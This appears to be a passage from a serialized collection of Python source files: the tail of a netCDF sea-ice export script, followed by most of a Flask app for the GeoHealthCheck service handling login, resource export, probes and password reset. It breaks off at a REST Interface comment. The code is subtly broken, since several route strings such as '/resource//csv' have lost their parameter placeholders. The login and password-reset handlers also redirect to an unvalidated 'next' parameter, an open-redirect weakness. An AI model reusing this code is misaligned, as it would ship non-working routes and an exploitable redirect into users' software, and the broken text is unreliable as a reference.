os.path.exists(outfilename):\n os.remove(outfilename)\n print ""Results written to netcdf file: %s""%(outfilename)\n if myvarname==""sic"": myvar=""SIC""\n \n f1 = Dataset(outfilename, mode=\'w\', format=myformat)\n f1.title = ""IPCC AR5 %s""%(myvar)\n f1.description = ""IPCC AR5 running averages of %s for model %s for scenario %s""%(myvar,modelName,scenario)\n f1.history = ""Created "" + str(datetime.now())\n f1.source = ""Trond Kristiansen (dummy@email.com)""\n f1.type = ""File in NetCDF3 format created using iceExtract.py""\n f1.Conventions = ""CF-1.0""\n\n """"""Define dimensions""""""\n f1.createDimension(\'x\', len(lon))\n f1.createDimension(\'y\', len(lat))\n f1.createDimension(\'time\', None)\n \n vnc = f1.createVariable(\'longitude\', \'d\', (\'x\',),zlib=False)\n vnc.long_name = \'Longitude\'\n vnc.units = \'degree_east\'\n vnc.standard_name = \'longitude\'\n vnc[:] = lon\n\n vnc = f1.createVariable(\'latitude\', \'d\', (\'y\',),zlib=False)\n vnc.long_name = \'Latitude\'\n vnc.units = \'degree_north\'\n vnc.standard_name = \'latitude\'\n vnc[:] = lat\n\n v_time = f1.createVariable(\'time\', \'d\', (\'time\',),zlib=False)\n v_time.long_name = \'Years\'\n v_time.units = \'Years\'\n v_time.field = \'time, scalar, series\'\n v_time[:]=time \n \n v_temp=f1.createVariable(\'SIC\', \'d\', (\'time\', \'y\', \'x\',),zlib=False)\n v_temp.long_name = ""Sea-ice area fraction (%)""\n v_temp.units = ""%""\n v_temp.time = ""time""\n v_temp.field=""SIC, scalar, series""\n v_temp.missing_value = 1e20\n \n \n if myvarname==\'sic\':\n f1.variables[\'SIC\'][:,:,:] = mydata\n \n f1.close()\n', '# =================================================================\n#\n# Authors: Tom Kralidis dummy@email.com\n# Just van den Broecke dummy@email.com\n#\n# Copyright (c) 2014 Tom Kralidis\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the ""Software""), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# =================================================================\n\nimport base64\nimport csv\nimport json\nimport logging\nfrom io import StringIO\n\nfrom flask import (abort, flash, g, jsonify, redirect,\n render_template, request, url_for)\nfrom flask_babel import gettext\nfrom flask_login import (LoginManager, login_user, logout_user,\n current_user, login_required)\nfrom flask_migrate import Migrate\nfrom itertools import chain\n\nimport views\nfrom __init__ import __version__\nfrom enums import RESOURCE_TYPES\nfrom factory import Factory\nfrom init import App\nfrom models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient\nfrom resourceauth import ResourceAuth\nfrom util import send_email, geocode, format_checked_datetime, \\\n format_run_status, format_obj_value\n\n# Module globals for convenience\nLOGGER = logging.getLogger(__name__)\nAPP = App.get_app()\nCONFIG = App.get_config()\nDB = App.get_db()\nBABEL = App.get_babel()\n\nMIGRATE = Migrate(APP, DB)\n\nLOGIN_MANAGER = LoginManager()\nLOGIN_MANAGER.init_app(APP)\n\nLANGUAGES = (\n (\'en\', \'English\'),\n (\'fr\', \'Français\'),\n (\'de\', \'German\'),\n (\'nl_NL\', \'Nederlands (Nederland)\'),\n (\'es_BO\', \'Español (Bolivia)\'),\n (\'hr_HR\', \'Croatian (Croatia)\')\n)\n\n# Should GHC Runner be run within GHC webapp?\nif CONFIG[\'GHC_RUNNER_IN_WEBAPP\'] is True:\n LOGGER.info(\'Running GHC Scheduler in WebApp\')\n from scheduler import start_schedule\n\n # Start scheduler\n start_schedule()\nelse:\n LOGGER.info(\'NOT Running GHC Scheduler in WebApp\')\n\n\n# commit or rollback shorthand\ndef db_commit():\n err = None\n try:\n DB.session.commit()\n except Exception:\n DB.session.rollback()\n # finally:\n # DB.session.close()\n return err\n\n\n@APP.before_request\ndef before_request():\n g.user = current_user\n if request.args and \'lang\' in request.args and request.args[\'lang\'] != \'\':\n g.current_lang = request.args[\'lang\']\n if not hasattr(g, \'current_lang\'):\n g.current_lang = \'en\'\n\n if CONFIG[\'GHC_REQUIRE_WEBAPP_AUTH\'] is True:\n # Login is required to access GHC Webapp.\n # We need to pass-through static resources like CSS.\n if any([\'/static/\' in request.path,\n request.path.endswith(\'.ico\'),\n g.user.is_authenticated(), # This is from Flask-Login\n (request.endpoint is not None\n and getattr(APP.view_functions[request.endpoint],\n \'is_public\', False))]):\n return # Access granted\n else:\n return redirect(url_for(\'login\'))\n\n\n# Marks (endpoint-) function as always to be accessible\n# (used for GHC_REQUIRE_WEBAPP_AUTH)\ndef public_route(decorated_function):\n decorated_function.is_public = True\n return decorated_function\n\n\n@APP.teardown_appcontext\ndef shutdown_session(exception=None):\n DB.session.remove()\n\n\n@BABEL.localeselector\ndef get_locale():\n return g.get(\'current_lang\', \'en\')\n # return request.accept_languages.best_match(LANGUAGES.keys())\n\n\n@LOGIN_MANAGER.user_loader\ndef load_user(identifier):\n return User.query.get(int(identifier))\n\n\n@LOGIN_MANAGER.unauthorized_handler\ndef unauthorized_callback():\n if request.query_string:\n url = \'%s%s?%s\' % (request.script_root, request.path,\n request.query_string)\n else:\n url = \'%s%s\' % (request.script_root, request.path)\n return redirect(url_for(\'login\', lang=g.current_lang, next=url))\n\n\n@LOGIN_MANAGER.request_loader\ndef load_user_from_request(request):\n\n # Try to login using Basic Auth\n # Inspiration: https://flask-login.readthedocs.io\n # /en/latest/#custom-login-using-request-loader\n basic_auth_val = request.headers.get(\'Authorization\')\n if basic_auth_val:\n basic_auth_val = basic_auth_val.replace(\'Basic \', \'\', 1)\n authenticated = False\n try:\n username, password = base64.b64decode(basic_auth_val).split(\':\')\n\n user = User.query.filter_by(username=username).first()\n if user:\n authenticated = user.authenticate(password)\n finally:\n # Ignore errors, they should all fail the auth attempt\n pass\n\n if not authenticated:\n LOGGER.warning(\'Unauthorized access for user=%s\' % username)\n abort(401)\n else:\n return user\n\n # TODO: may add login via api-key or token here\n\n # finally, return None if both methods did not login the user\n return None\n\n\n@APP.template_filter(\'cssize_reliability\')\ndef cssize_reliability(value, css_type=None):\n """"""returns CSS button class snippet based on score""""""\n\n number = int(value)\n\n if CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'red\'][\'min\'] <= number <= \\\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'red\'][\'max\']:\n score = \'danger\'\n panel = \'red\'\n elif (CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'orange\'][\'min\'] <= number <=\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'orange\'][\'max\']):\n score = \'warning\'\n panel = \'yellow\'\n elif (CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'green\'][\'min\'] <= number <=\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'green\'][\'max\']):\n score = \'success\'\n panel = \'green\'\n else: # should never really get here\n score = \'info\'\n panel = \'blue\'\n\n if css_type is not None and css_type == \'panel\':\n return panel\n else:\n return score\n\n\n@APP.template_filter(\'cssize_reliability2\')\ndef cssize_reliability2(value):\n """"""returns CSS panel class snippet based on score""""""\n\n return cssize_reliability(value, \'panel\')\n\n\n@APP.template_filter(\'round2\')\ndef round2(value):\n """"""rounds a number to 2 decimal places except for values of 0 or 100""""""\n\n if value in [0.0, 100.0]:\n return int(value)\n return round(value, 2)\n\n\n@APP.context_processor\ndef context_processors():\n """"""global context processors for templates""""""\n\n rtc = views.get_resource_types_counts()\n tags = views.get_tag_counts()\n return {\n \'app_version\': __version__,\n \'resource_types\': RESOURCE_TYPES,\n \'resource_types_counts\': rtc[\'counts\'],\n \'resources_total\': rtc[\'total\'],\n \'languages\': LANGUAGES,\n \'tags\': tags,\n \'tagnames\': list(tags.keys())\n }\n\n\n@APP.route(\'/\')\ndef home():\n """"""homepage""""""\n\n response = views.get_health_summary()\n return render_template(\'home.html\', response=response)\n\n\n@APP.route(\'/csv\', endpoint=\'csv\')\n@APP.route(\'/json\', endpoint=\'json\')\ndef export():\n """"""export resource list as JSON""""""\n\n resource_type = None\n\n if request.args.get(\'resource_type\') in RESOURCE_TYPES.keys():\n resource_type = request.args[\'resource_type\']\n\n query = request.args.get(\'q\')\n\n response = views.list_resources(resource_type, query)\n\n if request.url_rule.rule == \'/json\':\n json_dict = {\'total\': response[\'total\'], \'resources\': []}\n for r in response[\'resources\']:\n try:\n ghc_url = \'%s/resource/%s\' % \\\n (CONFIG[\'GHC_SITE_URL\'], r.identifier)\n last_run_report = \'-\'\n if r.last_run:\n last_run_report = r.last_run.report\n\n json_dict[\'resources\'].append({\n \'resource_type\': r.resource_type,\n \'title\': r.title,\n \'url\': r.url,\n \'ghc_url\': ghc_url,\n \'ghc_json\': \'%s/json\' % ghc_url,\n \'ghc_csv\': \'%s/csv\' % ghc_url,\n \'first_run\': format_checked_datetime(r.first_run),\n \'last_run\': format_checked_datetime(r.last_run),\n \'status\': format_run_status(r.last_run),\n \'min_response_time\': round(r.min_response_time, 2),\n \'average_response_time\': round(r.average_response_time, 2),\n \'max_response_time\': round(r.max_response_time, 2),\n \'reliability\': round(r.reliability, 2),\n \'last_report\': format_obj_value(last_run_report)\n })\n except Exception as e:\n LOGGER.warning(\n \'JSON error resource id=%d: %s\' % (r.identifier, str(e)))\n\n return jsonify(json_dict)\n elif request.url_rule.rule == \'/csv\':\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'resource_type\', \'title\', \'url\', \'ghc_url\', \'ghc_json\', \'ghc_csv\',\n \'first_run\', \'last_run\', \'status\', \'min_response_time\',\n \'average_response_time\', \'max_response_time\', \'reliability\'\n ]\n writer.writerow(header)\n for r in response[\'resources\']:\n try:\n ghc_url = \'%s%s\' % (CONFIG[\'GHC_SITE_URL\'],\n url_for(\'get_resource_by_id\',\n identifier=r.identifier))\n\n writer.writerow([\n r.resource_type,\n r.title,\n r.url,\n ghc_url,\n \'%s/json\' % ghc_url,\n \'%s/csv\' % ghc_url,\n format_checked_datetime(r.first_run),\n format_checked_datetime(r.last_run),\n format_run_status(r.last_run),\n round(r.min_response_time, 2),\n round(r.average_response_time, 2),\n round(r.max_response_time, 2),\n round(r.reliability, 2)\n ])\n except Exception as e:\n LOGGER.warning(\n \'CSV error resource id=%d: %s\' % (r.identifier, str(e)))\n\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/opensearch\')\ndef opensearch():\n """"""generate OpenSearch description document""""""\n\n content = render_template(\'opensearch_description.xml\')\n\n return content, 200, {\'Content-type\': \'text/xml\'}\n\n\n@APP.route(\'/resource//csv\', endpoint=\'csv-resource\')\n@APP.route(\'/resource//json\', endpoint=\'json-resource\')\ndef export_resource(identifier):\n """"""export resource as JSON or CSV""""""\n\n resource = views.get_resource_by_id(identifier)\n\n history_csv = \'%s/resource/%s/history/csv\' % (CONFIG[\'GHC_SITE_URL\'],\n resource.identifier)\n history_json = \'%s/resource/%s/history/json\' % (CONFIG[\'GHC_SITE_URL\'],\n resource.identifier)\n if \'json\' in request.url_rule.rule:\n last_run_report = \'-\'\n if resource.last_run:\n last_run_report = resource.last_run.report\n\n json_dict = {\n \'identifier\': resource.identifier,\n \'title\': resource.title,\n \'url\': resource.url,\n \'resource_type\': resource.resource_type,\n \'owner\': resource.owner.username,\n \'min_response_time\': resource.min_response_time,\n \'average_response_time\': resource.average_response_time,\n \'max_response_time\': resource.max_response_time,\n \'reliability\': resource.reliability,\n \'status\': format_run_status(resource.last_run),\n \'first_run\': format_checked_datetime(resource.first_run),\n \'last_run\': format_checked_datetime(resource.last_run),\n \'history_csv\': history_csv,\n \'history_json\': history_json,\n \'last_report\': format_obj_value(last_run_report)\n }\n return jsonify(json_dict)\n elif \'csv\' in request.url_rule.rule:\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'identifier\', \'title\', \'url\', \'resource_type\', \'owner\',\n \'min_response_time\', \'average_response_time\', \'max_response_time\',\n \'reliability\', \'status\', \'first_run\', \'last_run\', \'history_csv\',\n \'history_json\'\n ]\n\n writer.writerow(header)\n writer.writerow([\n resource.identifier,\n resource.title,\n resource.url,\n resource.resource_type,\n resource.owner.username,\n resource.min_response_time,\n resource.average_response_time,\n resource.max_response_time,\n resource.reliability,\n format_run_status(resource.last_run),\n format_checked_datetime(resource.first_run),\n format_checked_datetime(resource.last_run),\n history_csv,\n history_json\n ])\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/resource//history/csv\',\n endpoint=\'csv-resource-history\')\n@APP.route(\'/resource//history/json\',\n endpoint=\'json-resource-history\')\ndef export_resource_history(identifier):\n """"""export resource history as JSON or CSV""""""\n\n resource = views.get_resource_by_id(identifier)\n\n if \'json\' in request.url_rule.rule:\n json_dict = {\'runs\': []}\n\n for run in resource.runs:\n json_dict[\'runs\'].append({\n \'owner\': resource.owner.username,\n \'resource_type\': resource.resource_type,\n \'checked_datetime\': format_checked_datetime(run),\n \'title\': resource.title,\n \'url\': resource.url,\n \'response_time\': round(run.response_time, 2),\n \'status\': format_run_status(run)\n })\n return jsonify(json_dict)\n elif \'csv\' in request.url_rule.rule:\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'owner\', \'resource_type\', \'checked_datetime\', \'title\', \'url\',\n \'response_time\', \'status\'\n ]\n writer.writerow(header)\n for run in resource.runs:\n writer.writerow([\n resource.owner.username,\n resource.resource_type,\n format_checked_datetime(run),\n resource.title,\n resource.url,\n round(run.response_time, 2),\n format_run_status(run),\n ])\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/settings\')\ndef settings():\n """"""settings""""""\n pass\n\n\n@APP.route(\'/resources\')\ndef resources():\n """"""lists resources with optional filter""""""\n\n resource_type = None\n\n if request.args.get(\'resource_type\') in RESOURCE_TYPES.keys():\n resource_type = request.args[\'resource_type\']\n\n tag = request.args.get(\'tag\')\n\n query = request.args.get(\'q\')\n\n response = views.list_resources(resource_type, query, tag)\n return render_template(\'resources.html\', response=response)\n\n\n@APP.route(\'/resource/\')\ndef get_resource_by_id(identifier):\n """"""show resource""""""\n\n response = views.get_resource_by_id(identifier)\n return render_template(\'resource.html\', resource=response)\n\n\n@APP.route(\'/register\', methods=[\'GET\', \'POST\'])\ndef register():\n """"""register a new user""""""\n if not CONFIG[\'GHC_SELF_REGISTER\']:\n msg1 = gettext(\'This site is not configured for self-registration\')\n msg2 = gettext(\'Please contact\')\n msg = \'%s. %s %s\' % (msg1, msg2,\n CONFIG[\'GHC_ADMIN_EMAIL\'])\n flash(\'%s\' % msg, \'danger\')\n return render_template(\'register.html\', errmsg=msg)\n if request.method == \'GET\':\n return render_template(\'register.html\')\n\n # Check for existing user or email\n user = User.query.filter_by(username=request.form[\'username\']).first()\n email = User.query.filter_by(email=request.form[\'email\']).first()\n if user or email:\n flash(\'%s\' % gettext(\'Invalid username or email\'), \'danger\')\n return render_template(\'register.html\')\n\n user = User(request.form[\'username\'],\n request.form[\'password\'], request.form[\'email\'])\n\n DB.session.add(user)\n try:\n DB.session.commit()\n except Exception as err:\n DB.session.rollback()\n bad_column = err.message.split()[2]\n bad_value = request.form[bad_column]\n msg = gettext(\'already registered\')\n flash(\'%s %s %s\' % (bad_column, bad_value, msg), \'danger\')\n return redirect(url_for(\'register\', lang=g.current_lang))\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n\n@APP.route(\'/add\', methods=[\'GET\', \'POST\'])\n@login_required\ndef add():\n """"""add resource""""""\n if not g.user.is_authenticated():\n return render_template(\'add.html\')\n if request.method == \'GET\':\n return render_template(\'add.html\')\n resource_type = request.form[\'resource_type\']\n tags = request.form.getlist(\'tags\')\n url = request.form[\'url\'].strip()\n resources_to_add = []\n\n from healthcheck import sniff_test_resource, run_test_resource\n sniffed_resources = sniff_test_resource(CONFIG, resource_type, url)\n\n if not sniffed_resources:\n msg = gettext(""No resources detected"")\n LOGGER.exception()\n flash(msg, \'danger\')\n\n for (resource_type, resource_url,\n title, success, response_time,\n message, start_time, resource_tags,) in sniffed_resources:\n\n tags_to_add = []\n for tag in chain(tags, resource_tags):\n tag_obj = tag\n if not isinstance(tag, Tag):\n tag_obj = Tag.query.filter_by(name=tag).first()\n if tag_obj is None:\n tag_obj = Tag(name=tag)\n tags_to_add.append(tag_obj)\n\n resource_to_add = Resource(current_user,\n resource_type,\n title,\n resource_url,\n tags=tags_to_add)\n\n resources_to_add.append(resource_to_add)\n probe_to_add = None\n checks_to_add = []\n\n # Always add a default Probe and Check(s)\n # from the GHC_PROBE_DEFAULTS conf\n if resource_type in CONFIG[\'GHC_PROBE_DEFAULTS\']:\n resource_settings = CONFIG[\'GHC_PROBE_DEFAULTS\'][resource_type]\n probe_class = resource_settings[\'probe_class\']\n if probe_class:\n # Add the default Probe\n probe_obj = Factory.create_obj(probe_class)\n probe_to_add = ProbeVars(\n resource_to_add, probe_class,\n probe_obj.get_default_parameter_values())\n\n # Add optional default (parameterized)\n # Checks to add to this Probe\n checks_info = probe_obj.get_checks_info()\n checks_param_info = probe_obj.get_plugin_vars()[\'CHECKS_AVAIL\']\n for check_class in checks_info:\n check_param_info = checks_param_info[check_class]\n if \'default\' in checks_info[check_class]:\n if checks_info[check_class][\'default\']:\n # Filter out params for Check with fixed values\n param_defs = check_param_info[\'PARAM_DEFS\']\n param_vals = {}\n for param in param_defs:\n if param_defs[param][\'value\']:\n param_vals[param] = \\\n param_defs[param][\'value\']\n check_vars = CheckVars(\n probe_to_add, check_class, param_vals)\n checks_to_add.append(check_vars)\n\n result = run_test_resource(resource_to_add)\n\n run_to_add = Run(resource_to_add, result)\n\n DB.session.add(resource_to_add)\n # prepopulate notifications for current user\n resource_to_add.set_recipients(\'email\', [g.user.email])\n\n if probe_to_add:\n DB.session.add(probe_to_add)\n for check_to_add in checks_to_add:\n DB.session.add(check_to_add)\n DB.session.add(run_to_add)\n\n try:\n DB.session.commit()\n msg = gettext(\'Services registered\')\n flash(\'%s (%s, %s)\' % (msg, resource_type, url), \'success\')\n except Exception as err:\n DB.session.rollback()\n flash(str(err), \'danger\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n if len(resources_to_add) == 1:\n return edit_resource(resources_to_add[0].identifier)\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/resource//update\', methods=[\'POST\'])\n@login_required\ndef update(resource_identifier):\n """"""update a resource""""""\n\n update_counter = 0\n status = \'success\'\n\n try:\n resource_identifier_dict = request.get_json()\n\n resource = Resource.query.filter_by(\n identifier=resource_identifier).first()\n\n for key, value in resource_identifier_dict.items():\n if key == \'tags\':\n resource_tags = [t.name for t in resource.tags]\n\n tags_to_add = set(value) - set(resource_tags)\n tags_to_delete = set(resource_tags) - set(value)\n\n # Existing Tags: create relation else add new Tag\n all_tag_objs = Tag.query.all()\n for tag in tags_to_add:\n tag_add_obj = None\n for tag_obj in all_tag_objs:\n if tag == tag_obj.name:\n # use existing\n tag_add_obj = tag_obj\n break\n\n if not tag_add_obj:\n # add new\n tag_add_obj = Tag(name=tag)\n DB.session.add(tag_add_obj)\n\n resource.tags.append(tag_add_obj)\n\n for tag in tags_to_delete:\n tag_to_delete = Tag.query.filter_by(name=tag).first()\n resource.tags.remove(tag_to_delete)\n\n update_counter += 1\n elif key == \'probes\':\n # Remove all existing ProbeVars for Resource\n for probe_var in resource.probe_vars:\n resource.probe_vars.remove(probe_var)\n\n # Add ProbeVars anew each with optional CheckVars\n for probe in value:\n LOGGER.info(\'adding Probe class=%s parms=%s\' %\n (probe[\'probe_class\'], str(probe)))\n probe_vars = ProbeVars(resource, probe[\'probe_class\'],\n probe[\'parameters\'])\n for check in probe[\'checks\']:\n check_vars = CheckVars(\n probe_vars, check[\'check_class\'],\n check[\'parameters\'])\n probe_vars.check_vars.append(check_vars)\n\n resource.probe_vars.append(probe_vars)\n\n update_counter += 1\n elif key == \'notify_emails\':\n resource.set_recipients(\'email\',\n [v for v in value if v.strip()])\n elif key == \'notify_webhooks\':\n resource.set_recipients(\'webhook\',\n [v for v in value if v.strip()])\n elif key == \'auth\':\n resource.auth = value\n elif getattr(resource, key) != resource_identifier_dict[key]:\n # Update other resource attrs, mainly \'name\'\n setattr(resource, key, resource_identifier_dict[key])\n min_run_freq = CONFIG[\'GHC_MINIMAL_RUN_FREQUENCY_MINS\']\n if int(resource.run_frequency) < min_run_freq:\n resource.run_frequency = min_run_freq\n update_counter += 1\n\n # Always update geo-IP: maybe failure on creation or\n # IP-address of URL may have changed.\n latitude, longitude = geocode(resource.url)\n if latitude != 0.0 and longitude != 0.0:\n # Only update for valid lat/lon\n resource.latitude = latitude\n resource.longitude = longitude\n update_counter += 1\n\n except Exception as err:\n LOGGER.error(""Cannot update resource: %s"", err, exc_info=err)\n DB.session.rollback()\n status = str(err)\n update_counter = 0\n # finally:\n # DB.session.close()\n\n if update_counter > 0:\n err = db_commit()\n if err:\n status = str(err)\n\n return jsonify({\'status\': status})\n\n\n@APP.route(\'/resource//test\', methods=[\'GET\', \'POST\'])\n@login_required\ndef test(resource_identifier):\n """"""test a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(request.referrer)\n\n from healthcheck import run_test_resource\n result = run_test_resource(\n resource)\n\n if request.method == \'GET\':\n if result.message == \'Skipped\':\n msg = gettext(\'INFO\')\n flash(\'%s: %s\' % (msg, result.message), \'info\')\n elif result.message not in [\'OK\', None, \'None\']:\n msg = gettext(\'ERROR\')\n flash(\'%s: %s\' % (msg, result.message), \'danger\')\n else:\n flash(gettext(\'Resource tested successfully\'), \'success\')\n\n return redirect(url_for(\'get_resource_by_id\', lang=g.current_lang,\n identifier=resource_identifier))\n elif request.method == \'POST\':\n return jsonify(result.get_report())\n\n\n@APP.route(\'/resource//edit\')\n@login_required\ndef edit_resource(resource_identifier):\n """"""edit a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(request.referrer)\n\n probes_avail = views.get_probes_avail(resource.resource_type, resource)\n\n suggestions = json.dumps(Recipient.get_suggestions(\'email\',\n g.user.username))\n\n return render_template(\'edit_resource.html\',\n lang=g.current_lang,\n resource=resource,\n suggestions=suggestions,\n auths_avail=ResourceAuth.get_auth_defs(),\n probes_avail=probes_avail)\n\n\n@APP.route(\'/resource//delete\')\n@login_required\ndef delete(resource_identifier):\n """"""delete a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n if g.user.role != \'admin\' and g.user.username != resource.owner.username:\n msg = gettext(\'You do not have access to delete this resource\')\n flash(msg, \'danger\')\n return redirect(url_for(\'get_resource_by_id\', lang=g.current_lang,\n identifier=resource_identifier))\n\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n resource.clear_recipients()\n DB.session.delete(resource)\n\n try:\n DB.session.commit()\n flash(gettext(\'Resource deleted\'), \'success\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n except Exception as err:\n DB.session.rollback()\n flash(str(err), \'danger\')\n return redirect(url_for(request.referrer))\n\n\n@APP.route(\'/probe///edit_form\')\n@APP.route(\'/probe//edit_form\')\n@login_required\ndef get_probe_edit_form(probe_class, resource_identifier=None):\n """"""get the form to edit a Probe""""""\n\n probe_obj = Factory.create_obj(probe_class)\n if resource_identifier:\n resource = views.get_resource_by_id(resource_identifier)\n if resource:\n probe_obj._resource = resource\n probe_obj.expand_params(resource)\n\n probe_info = probe_obj.get_plugin_vars()\n probe_vars = ProbeVars(\n None, probe_class, probe_obj.get_default_parameter_values())\n\n # Get only the default Checks for this Probe class\n checks_avail = probe_obj.get_checks_info_defaults()\n checks_avail = probe_obj.expand_check_vars(checks_avail)\n\n for check_class in checks_avail:\n check_obj = Factory.create_obj(check_class)\n check_params = check_obj.get_default_parameter_values()\n probe_check_param_defs = \\\n probe_info[\'CHECKS_AVAIL\'][check_class][\'PARAM_DEFS\']\n for param in probe_check_param_defs:\n if \'value\' in probe_check_param_defs[param]:\n check_params[param] = probe_check_param_defs[param][\'value\']\n\n # Appends \'check_vars\' to \'probe_vars\' (SQLAlchemy)\n CheckVars(probe_vars, check_class, check_params)\n\n return render_template(\'includes/probe_edit_form.html\',\n lang=g.current_lang,\n probe=probe_vars, probe_info=probe_info)\n\n\n@APP.route(\'/check//edit_form\')\n@login_required\ndef get_check_edit_form(check_class):\n """"""get the form to edit a Check""""""\n\n check_obj = Factory.create_obj(check_class)\n check_info = check_obj.get_plugin_vars()\n check_vars = CheckVars(\n None, check_class, check_obj.get_default_parameter_values())\n\n return render_template(\'includes/check_edit_form.html\',\n lang=g.current_lang,\n check=check_vars, check_info=check_info)\n\n\n@APP.route(\'/login\', methods=[\'GET\', \'POST\'])\n@public_route\ndef login():\n """"""login""""""\n if request.method == \'GET\':\n return render_template(\'login.html\')\n username = request.form[\'username\']\n password = request.form[\'password\']\n registered_user = User.query.filter_by(username=username).first()\n authenticated = False\n if registered_user:\n # May not have upgraded to pw encryption: warn\n if len(registered_user.password) < 80:\n msg = \'Please upgrade GHC to encrypted passwords first, see docs!\'\n flash(gettext(msg), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n try:\n authenticated = registered_user.authenticate(password)\n finally:\n pass\n\n if not authenticated:\n flash(gettext(\'Invalid username and / or password\'), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n # Login ok\n login_user(registered_user)\n\n if \'next\' in request.args:\n return redirect(request.args.get(\'next\'))\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/logout\')\ndef logout():\n """"""logout""""""\n logout_user()\n flash(gettext(\'Logged out\'), \'success\')\n if request.referrer:\n return redirect(request.referrer)\n else:\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/reset_req\', methods=[\'GET\', \'POST\'])\n@public_route\ndef reset_req():\n """"""\n Reset password request handling.\n """"""\n if request.method == \'GET\':\n return render_template(\'reset_password_request.html\')\n\n # Reset request form with email\n email = request.form[\'email\']\n registered_user = User.query.filter_by(email=email).first()\n if registered_user is None:\n LOGGER.warn(\'Invalid email for reset_req: %s\' % email)\n flash(gettext(\'Invalid email\'), \'danger\')\n return redirect(url_for(\'reset_req\', lang=g.current_lang))\n\n # Generate reset url using user-specific token\n token = registered_user.get_token()\n reset_url = \'%s/reset/%s\' % (CONFIG[\'GHC_SITE_URL\'], token)\n\n # Create message body with reset link\n msg_body = render_template(\'reset_password_email.txt\',\n lang=g.current_lang, config=CONFIG,\n reset_url=reset_url,\n username=registered_user.username)\n\n try:\n from email.mime.text import MIMEText\n from email.utils import formataddr\n msg = MIMEText(msg_body, \'plain\', \'utf-8\')\n msg[\'From\'] = formataddr((CONFIG[\'GHC_SITE_TITLE\'],\n CONFIG[\'GHC_ADMIN_EMAIL\']))\n msg[\'To\'] = registered_user.email\n msg[\'Subject\'] = \'[%s] %s\' % (CONFIG[\'GHC_SITE_TITLE\'],\n gettext(\'reset password\'))\n\n from_addr = \'%s <%s>\' % (CONFIG[\'GHC_SITE_TITLE\'],\n CONFIG[\'GHC_ADMIN_EMAIL\'])\n\n to_addr = registered_user.email\n\n msg_text = msg.as_string()\n send_email(CONFIG[\'GHC_SMTP\'], from_addr, to_addr, msg_text)\n except Exception as err:\n msg = \'Cannot send email. Contact admin: \'\n LOGGER.warn(msg + \' err=\' + str(err))\n flash(gettext(msg) + CONFIG[\'GHC_ADMIN_EMAIL\'], \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n flash(gettext(\'Password reset link sent via email\'), \'success\')\n\n if \'next\' in request.args:\n return redirect(request.args.get(\'next\'))\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/reset/\', methods=[\'GET\', \'POST\'])\n@public_route\ndef reset(token=None):\n """"""\n Reset password submit form handling.\n """"""\n\n # Must have at least a token to proceed.\n if token is None:\n return redirect(url_for(\'reset_req\', lang=g.current_lang))\n\n # Token received: verify if ok, may also time-out.\n registered_user = User.verify_token(token)\n if registered_user is None:\n LOGGER.warn(\'Cannot find User from token: %s\' % token)\n flash(gettext(\'Invalid token\'), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n # Token and user ok: return reset form.\n if request.method == \'GET\':\n return render_template(\'reset_password_form.html\')\n\n # Valid token and user: change password from form-value\n password = request.form[\'password\']\n if not password:\n flash(gettext(\'Password required\'), \'danger\')\n return redirect(url_for(\'reset/%s\' % token, lang=g.current_lang))\n registered_user.set_password(password)\n DB.session.add(registered_user)\n\n try:\n DB.session.commit()\n flash(gettext(\'Update password OK\'), \'success\')\n except Exception as err:\n msg = \'Update password failed!\'\n LOGGER.warn(msg + \' err=\' + str(err))\n DB.session.rollback()\n flash(gettext(msg), \'danger\')\n\n # Finally redirect user to login page\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n\n#\n# REST Interface 